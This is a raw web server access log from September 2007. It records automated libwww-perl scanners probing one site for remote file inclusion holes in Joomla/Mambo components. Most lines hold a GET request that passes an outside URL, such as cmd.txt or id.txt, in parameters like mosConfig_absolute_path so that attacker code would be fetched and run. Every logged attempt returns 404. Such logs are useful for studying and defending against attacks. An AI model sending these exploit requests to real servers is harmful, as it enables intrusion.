85.214.68.207 - - [23/Sep/2007:19:40:16 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.18.233.58 - - [23/Sep/2007:19:40:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://teamjl.net/components/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [23/Sep/2007:19:40:25 -0700] "GET //skin/zero_vote/error.php?dir=http://teamjl.net/components/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.144.158.163 - - [23/Sep/2007:19:41:11 -0700] "GET /logs/access_070806.log/home.viewdetails.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.233.58 - - [23/Sep/2007:19:41:31 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://teamjl.net/components/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [23/Sep/2007:19:41:32 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://teamjl.net/components/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:19:42:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:42:46 -0700] "GET /logs/access_070827.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:42:47 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:42:48 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
81.169.134.61 - - [23/Sep/2007:19:42:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:19:42:59 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:43:13 -0700] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:43:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:19:43:14 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:19:43:38 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:19:43:38 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.213.232 - - [23/Sep/2007:19:44:05 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org" 212.241.21